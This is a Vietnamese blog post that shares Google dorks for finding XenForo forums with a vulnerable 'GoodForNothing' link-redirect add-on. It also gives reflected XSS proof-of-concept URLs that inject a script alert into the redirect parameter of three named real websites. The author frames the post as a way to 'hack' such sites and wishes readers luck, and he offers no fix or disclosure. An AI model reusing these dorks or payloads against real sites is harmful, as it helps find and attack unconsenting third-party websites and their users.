Search Dork XSS Xenforo Google Hacking Database

Xuất phát từ bài viết của junookyo tại đây  mình nảy sinh một việc đó là thiết kế một dork trên google để hack các website đang sử dụng xenforo và sau khi mày mò cũng đã mò ra một số dork có thể serach ra được một số web dùng xenforo bị lỗi XSS



Exploit: GoodForNothing Link Proxy XSS

Google Dork : intext:XenForo™ ©2011 XenForo Ltd inurl:redirect/?url=
                        intext:XenForo™ ©2012 XenForo Ltd inurl:redirect/?url=
                        intext:XenForo™ ©2013 XenForo Ltd inurl:redirect/?url=
                        intext:XenForo™ ©2014 XenForo Ltd inurl:redirect/?url=
                        intext:XenForo™ ©2015 XenForo Ltd inurl:redirect/?url=
                        intext:Powered by GoodForNothing™ Url Redirector

Discovered By : Vô Ưu
Vendor Homepage : vouuvhb.blogspot.com





Demos:

http://luathoc.cafeluat.com/redirect/?url=<script>alert('vô ưu')</script>

https://banlait.xyz/redirect/?url=<script>alert('vô ưu')</script>

http://banthatnhanh.com/redirect/?url=<script>alert('vô ưu')</script>

Chúc các bạn may mắn :)
Share on Google Plus

About Vo Uu

Tác Giả là người chuyên nghiên cứu về các kỹ thuật hacking, security, marketing, là người có góc nhìn lạ và đi sâu vấn đề cũng như là một con người thẳng thắn góp ý. Nếu sử dụng bài trên blog mong các bạn dẫn lại nguồn tác giả!!! Tác Giả rất mong có sự đóng góp hội ý từ cộng đồng để cho an toàn an ninh mạng việt nam ngày càng được an toàn hơn!!

0 nhận xét:

Post a Comment